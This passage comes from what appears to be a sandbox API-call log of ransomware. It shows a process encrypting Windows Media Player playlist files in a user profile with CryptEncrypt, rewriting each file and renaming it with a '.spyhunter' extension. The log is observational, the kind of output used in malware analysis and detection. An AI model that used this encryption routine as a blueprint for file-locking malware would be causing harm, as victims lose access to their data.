halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl.spyhunter")) returned 1 [0138.518] GetProcessHeap () returned 0x2c0000 [0138.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.518] GetProcessHeap () returned 0x2c0000 [0138.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.518] GetProcessHeap () returned 0x2c0000 [0138.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc9b98 | out: hHeap=0x2c0000) returned 1 [0138.518] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f358 | out: pbBuffer=0x57f358) returned 1 [0138.518] GetProcessHeap () returned 0x2c0000 [0138.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.518] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f350*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f350*=0x30) returned 1 [0138.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.519] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0138.519] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0138.519] GetProcessHeap () returned 0x2c0000 [0138.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.519] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f314, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f314*=0x4f3, lpOverlapped=0x0) returned 1 [0138.520] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.520] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4f3, lpNumberOfBytesWritten=0x57f314, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f314*=0x4f3, lpOverlapped=0x0) returned 1 [0138.520] GetProcessHeap () returned 0x2c0000 [0138.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.520] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.520] WriteFile (in: hFile=0x178, lpBuffer=0x57f354*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f314, lpOverlapped=0x0 | out: lpBuffer=0x57f354*, lpNumberOfBytesWritten=0x57f314*=0x4, lpOverlapped=0x0) returned 1 [0138.520] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f314, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f314*=0x30, lpOverlapped=0x0) returned 1 [0138.521] CloseHandle (hObject=0x178) returned 1 [0138.521] GetProcessHeap () returned 0x2c0000 [0138.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.521] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.spyhunter") returned 145 [0138.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl.spyhunter")) returned 1 [0138.521] GetProcessHeap () returned 0x2c0000 [0138.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.521] GetProcessHeap () returned 0x2c0000 [0138.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.521] GetProcessHeap () returned 0x2c0000 [0138.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4698 | out: hHeap=0x2c0000) returned 1 [0138.522] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f358 | out: pbBuffer=0x57f358) returned 1 [0138.522] GetProcessHeap () returned 0x2c0000 [0138.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.522] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f350*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f350*=0x30) returned 1 [0138.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.522] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 137 [0138.522] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0138.522] GetProcessHeap () returned 0x2c0000 [0138.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.522] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f314, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f314*=0x4ff, lpOverlapped=0x0) returned 1 [0138.523] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.524] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4ff, lpNumberOfBytesWritten=0x57f314, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f314*=0x4ff, lpOverlapped=0x0) returned 1 [0138.524] GetProcessHeap () returned 0x2c0000 [0138.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.524] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.524] WriteFile (in: hFile=0x178, lpBuffer=0x57f354*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f314, lpOverlapped=0x0 | out: lpBuffer=0x57f354*, lpNumberOfBytesWritten=0x57f314*=0x4, lpOverlapped=0x0) returned 1 [0138.524] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f314, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f314*=0x30, lpOverlapped=0x0) returned 1 [0138.524] CloseHandle (hObject=0x178) returned 1 [0138.524] GetProcessHeap () returned 0x2c0000 [0138.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.524] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.spyhunter") returned 147 [0138.524] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl.spyhunter")) returned 1 [0138.525] GetProcessHeap () returned 0x2c0000 [0138.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.525] GetProcessHeap () returned 0x2c0000 [0138.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.526] GetProcessHeap () returned 0x2c0000 [0138.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc9a38 | out: hHeap=0x2c0000) returned 1 [0138.526] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f350 | out: pbBuffer=0x57f350) returned 1 [0138.526] GetProcessHeap () returned 0x2c0000 [0138.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.526] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f348*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f348*=0x30) returned 1 [0138.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0138.526] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".txt") returned 0x0 [0138.527] GetProcessHeap () returned 0x2c0000 [0138.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.527] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f30c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f30c*=0x414, lpOverlapped=0x0) returned 1 [0138.529] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffbec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.529] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x414, lpNumberOfBytesWritten=0x57f30c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f30c*=0x414, lpOverlapped=0x0) returned 1 [0138.529] GetProcessHeap () returned 0x2c0000 [0138.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.529] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.529] WriteFile (in: hFile=0x178, lpBuffer=0x57f34c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f30c, lpOverlapped=0x0 | out: lpBuffer=0x57f34c*, lpNumberOfBytesWritten=0x57f30c*=0x4, lpOverlapped=0x0) returned 1 [0138.529] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f30c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f30c*=0x30, lpOverlapped=0x0) returned 1 [0138.529] CloseHandle (hObject=0x178) returned 1 [0138.529] GetProcessHeap () returned 0x2c0000 [0138.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.530] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.spyhunter") returned 145 [0138.530] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl.spyhunter")) returned 1 [0138.531] GetProcessHeap () returned 0x2c0000 [0138.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.531] GetProcessHeap () returned 0x2c0000 [0138.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.531] GetProcessHeap () returned 0x2c0000 [0138.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4540 | out: hHeap=0x2c0000) returned 1 [0138.531] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f350 | out: pbBuffer=0x57f350) returned 1 [0138.531] GetProcessHeap () returned 0x2c0000 [0138.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.531] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f348*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f348*=0x30) returned 1 [0138.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.532] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl") returned 120 [0138.532] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".txt") returned 0x0 [0138.532] GetProcessHeap () returned 0x2c0000 [0138.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.532] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f30c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f30c*=0x249, lpOverlapped=0x0) returned 1 [0138.533] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.533] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x57f30c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f30c*=0x249, lpOverlapped=0x0) returned 1 [0138.533] GetProcessHeap () returned 0x2c0000 [0138.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.533] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.533] WriteFile (in: hFile=0x178, lpBuffer=0x57f34c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f30c, lpOverlapped=0x0 | out: lpBuffer=0x57f34c*, lpNumberOfBytesWritten=0x57f30c*=0x4, lpOverlapped=0x0) returned 1 [0138.534] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f30c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f30c*=0x30, lpOverlapped=0x0) returned 1 [0138.534] CloseHandle (hObject=0x178) returned 1 [0138.534] GetProcessHeap () returned 0x2c0000 [0138.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.534] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl.spyhunter") returned 130 [0138.534] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl.spyhunter")) returned 1 [0138.535] GetProcessHeap () returned 0x2c0000 [0138.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.535] GetProcessHeap () returned 0x2c0000 [0138.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.535] GetProcessHeap () returned 0x2c0000 [0138.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbdcf8 | out: hHeap=0x2c0000) returned 1 [0138.535] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f348 | out: pbBuffer=0x57f348) returned 1 [0138.535] GetProcessHeap () returned 0x2c0000 [0138.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.535] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f340*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f340*=0x30) returned 1 [0138.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.536] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl") returned 117 [0138.536] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".txt") returned 0x0 [0138.536] GetProcessHeap () returned 0x2c0000 [0138.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.536] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f304, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f304*=0x427, lpOverlapped=0x0) returned 1 [0138.537] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffbd9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.537] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x427, lpNumberOfBytesWritten=0x57f304, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f304*=0x427, lpOverlapped=0x0) returned 1 [0138.537] GetProcessHeap () returned 0x2c0000 [0138.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0138.537] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.537] WriteFile (in: hFile=0x178, lpBuffer=0x57f344*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f304, lpOverlapped=0x0 | out: lpBuffer=0x57f344*, lpNumberOfBytesWritten=0x57f304*=0x4, lpOverlapped=0x0) returned 1 [0138.537] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f304, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f304*=0x30, lpOverlapped=0x0) returned 1 [0138.538] CloseHandle (hObject=0x178) returned 1 [0138.538] GetProcessHeap () returned 0x2c0000 [0138.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.538] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl.spyhunter") returned 127 [0138.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl.spyhunter")) returned 1 [0138.538] GetProcessHeap () returned 0x2c0000 [0138.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.538] GetProcessHeap () returned 0x2c0000 [0138.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0138.539] GetProcessHeap () returned 0x2c0000 [0138.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47bc8 | out: hHeap=0x2c0000) returned 1 [0138.539] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f348 | out: pbBuffer=0x57f348) returned 1 [0138.539] GetProcessHeap () returned 0x2c0000 [0138.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0138.539] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f340*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f340*=0x30) returned 1 [0138.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0138.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl") returned 129 [0138.539] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".txt") returned 0x0 [0138.539] GetProcessHeap () returned 0x2c0000 [0138.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0138.539] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f304, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f304*=0x401, lpOverlapped=0x0) returned 1 [0138.601] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffbff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.601] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x401, lpNumberOfBytesWritten=0x57f304, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f304*=0x401, lpOverlapped=0x0) returned 1 [0138.601] GetProcessHeap () returned 0x2c0000 [0138.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 